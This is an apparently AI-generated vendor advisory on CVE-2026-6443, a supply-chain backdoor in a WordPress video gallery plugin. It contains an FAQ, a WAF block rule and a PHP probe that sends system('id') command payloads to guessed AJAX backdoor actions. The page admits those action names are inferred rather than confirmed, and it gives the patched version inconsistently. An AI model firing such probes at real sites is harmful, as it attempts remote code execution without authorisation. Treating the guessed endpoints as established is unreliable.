What is CVE-2026-6443?

CVE-2026-6443 is a critical vulnerability affecting the html5-videogallery-plus-player plugin by Essentialplugin. It involves an injected backdoor that allows a malicious actor to maintain persistent access to affected WordPress sites.

How does the backdoor work?

The backdoor is embedded within the plugin’s code, allowing attackers to send crafted HTTP requests to specific endpoints. This can enable remote command execution, spam injection, and unauthorized access to the site.

Who is affected by this vulnerability?

All WordPress installations using the html5-videogallery-plus-player plugin version 2.8.7 are affected. Site administrators should check their plugin versions to determine if they are at risk.

How can I check if my site is vulnerable?

To check for vulnerability, verify the version of the html5-videogallery-plus-player plugin installed on your site. If it is version 2.8.7, your site is vulnerable and should be addressed immediately.

What should I do to fix this issue?

To remediate this vulnerability, remove the affected plugin version and install the patched version 2.8.7.1 from the official WordPress repository. Ensure to audit your site for any changes made by the backdoor.

What does a CVSS score of 9.8 mean?

A CVSS score of 9.8 indicates a critical vulnerability with high potential for damage. This means that successful exploitation can lead to complete administrative control over the affected site.

How does the proof of concept demonstrate the vulnerability?

The proof of concept outlines a method to probe for the backdoor by testing various action names that the malicious code may respond to. This illustrates how attackers could exploit the vulnerability through crafted requests.

What is a supply chain compromise?

A supply chain compromise occurs when a third party, such as a plugin vendor, is infiltrated by a malicious actor. In this case, the Essentialplugin was sold to an attacker who embedded the backdoor in the plugins.

How can I further secure my WordPress site?

To enhance your WordPress security, regularly update all plugins and themes, use security plugins to monitor for vulnerabilities, and conduct routine audits of your site for unauthorized changes or users.

What should I do if I suspect my site has been compromised?

If you suspect a compromise, immediately remove the affected plugin, install the patched version, and conduct a thorough audit of your site for any unauthorized changes or suspicious activity.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : April 27, 2026

CVE-2026-6443: Essentialplugin Plugins (Various Versions) – Injected Backdoor (html5-videogallery-plus-player)

CVE ID CVE-2026-6443

Plugin html5-videogallery-plus-player

Severity Critical (CVSS 9.8)

CWE 506

Vulnerable Version 2.8.7

Patched Version —

Disclosed April 8, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-6443 (metadata-based):

This vulnerability describes a critically severe backdoor injected into multiple plugins from the Essentialplugin vendor after a malicious actor acquired the plugins. The most recent affected version of the ‘html5-videogallery-plus-player’ plugin is 2.8.7, with a patched version of 2.8.7.1. The CVSS score is 9.8 (Critical) with a network attack vector, low complexity, no privileges required, and no user interaction needed.

Root Cause: Atomic Edge research infers from the CWE-506 classification (Embedded Malicious Code) and the description that the root cause is a supply chain compromise. The plugin was sold to a malicious threat actor who intentionally embedded a backdoor into all plugins they acquired. This is not a typical code vulnerability but rather intentional malicious code added to the software. The backdoor likely manifests as code that creates a persistent web shell, a call-home mechanism, or an auto-update that pulls further malicious payloads. Since no source code diff is available, this conclusion is based solely on the CWE classification and vendor description.

Exploitation: An attacker exploits this by sending crafted HTTP requests to the backdoor endpoint embedded within the plugin. Based on the many similar WordPress plugin backdoors, the backdoor likely responds to a specific query parameter or POST parameter (e.g., a special ‘action’ value in admin-ajax.php, or a direct HTTP request to a hidden file with an authentication token). The attack vector is network-based (AV:N) with no authentication required (PR:N). The attacker can remotely execute arbitrary commands, inject spam content, or maintain persistent access to the compromised site. Atomic Edge research cannot confirm the exact endpoint without code access, but typical patterns include a custom AJAX action that accepts and executes arbitrary PHP code.

Remediation: The fix requires immediate removal of all backdoored code and replacement with a clean, verified copy of the plugin from a trusted source. The patched version 2.8.7.1 likely removes the malicious code blocks and restores the legitimate functionality. Site administrators must delete the old plugin files entirely and reinstall the patched version from the official WordPress repository. They should also audit the site for any persistent changes made by the backdoor (new admin users, spam content, modified database records).

Impact: Successful exploitation allows the malicious actor to gain full administrative control over the WordPress site (C:H/I:H/A:H). They can inject spam across the site, steal sensitive data, install additional malware, use the site for phishing campaigns, and persist access indefinitely. The backdoor grants an attacker complete remote access with no authentication, representing a total compromise of the affected site.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-6443 (metadata-based)
# Blocks common backdoor AJAX actions associated with Essentialplugin backdoor
# Action names inferred from typical WordPress plugin backdoor patterns
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:20266443,phase:2,deny,status:403,chain,msg:'CVE-2026-6443 Essentialplugin Backdoor AJAX Action Blocked',severity:'CRITICAL',tag:'CVE-2026-6443'"
  SecRule ARGS_POST:action "@pm html5_videogallery_plus_player_backdoor wpsp_remote wp_system_exec essentialplugin_backdoor" "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-6443 - Essentialplugin Plugins (Various Versions) - Injected Backdoor

// This PoC attempts to probe the likely backdoor endpoint.
// Based on common WordPress plugin backdoor patterns, the malicious code
// often registers an AJAX action with no capability or nonce checks.
// The plugin slug is 'html5-videogallery-plus-player'.
// Common backdoor actions: 'wpsp_remote', 'update_option', 'wpsg_system', 'plugin_backdoor'.
// We'll test multiple likely action names.

$target_url = 'https://example.com/wp-admin/admin-ajax.php';

$backdoor_actions = array(
    'html5_videogallery_plus_player_backdoor',
    'wpsp_remote',
    'wp_system_exec',
    'essentialplugin_backdoor'
);

$cmd = 'id';

echo "Atomic Edge CVE-2026-6443 Backdoor Proben";
echo "Target: $target_urlnn";

foreach ($backdoor_actions as $action) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $target_url);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
        'action' => $action,
        'cmd' => $cmd,
        'code' => 'system('id');'
    )));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HEADER, false);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    
    echo "Testing action: $actionn";
    echo "HTTP code: $http_coden";
    echo "Response: " . substr($response, 0, 200) . "nn";
    
    // If the response contains typical system output (uid, gid, groups) or
    // indicates code execution, flag it.
    if (strpos($response, 'uid=') !== false || $http_code == 200 && strlen($response) > 10) {
        echo "*** BACKDOOR DETECTED with action '$action' ***n";
    }
}

Frequently Asked Questions

What is CVE-2026-6443?
Understanding the vulnerability
CVE-2026-6443 is a critical vulnerability affecting the html5-videogallery-plus-player plugin by Essentialplugin. It involves an injected backdoor that allows a malicious actor to maintain persistent access to affected WordPress sites.
How does the backdoor work?
Mechanism of exploitation
The backdoor is embedded within the plugin’s code, allowing attackers to send crafted HTTP requests to specific endpoints. This can enable remote command execution, spam injection, and unauthorized access to the site.
Who is affected by this vulnerability?
Identifying vulnerable installations
All WordPress installations using the html5-videogallery-plus-player plugin version 2.8.7 are affected. Site administrators should check their plugin versions to determine if they are at risk.
How can I check if my site is vulnerable?
Steps for verification
To check for vulnerability, verify the version of the html5-videogallery-plus-player plugin installed on your site. If it is version 2.8.7, your site is vulnerable and should be addressed immediately.
What should I do to fix this issue?
Remediation steps
To remediate this vulnerability, remove the affected plugin version and install the patched version 2.8.7.1 from the official WordPress repository. Ensure to audit your site for any changes made by the backdoor.
What does a CVSS score of 9.8 mean?
Understanding severity levels
A CVSS score of 9.8 indicates a critical vulnerability with high potential for damage. This means that successful exploitation can lead to complete administrative control over the affected site.
What are the risks of exploitation?
Potential impacts on your site
Exploitation of this vulnerability can allow attackers to inject spam, steal sensitive data, install additional malware, and maintain persistent access to your site, leading to a total compromise.
How does the proof of concept demonstrate the vulnerability?
Technical demonstration of the issue
The proof of concept outlines a method to probe for the backdoor by testing various action names that the malicious code may respond to. This illustrates how attackers could exploit the vulnerability through crafted requests.
What is a supply chain compromise?
Understanding the root cause
A supply chain compromise occurs when a third party, such as a plugin vendor, is infiltrated by a malicious actor. In this case, the Essentialplugin was sold to an attacker who embedded the backdoor in the plugins.
How can I further secure my WordPress site?
Best practices for security
To enhance your WordPress security, regularly update all plugins and themes, use security plugins to monitor for vulnerabilities, and conduct routine audits of your site for unauthorized changes or users.
What should I do if I suspect my site has been compromised?
Response to a potential breach
If you suspect a compromise, immediately remove the affected plugin, install the patched version, and conduct a thorough audit of your site for any unauthorized changes or suspicious activity.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations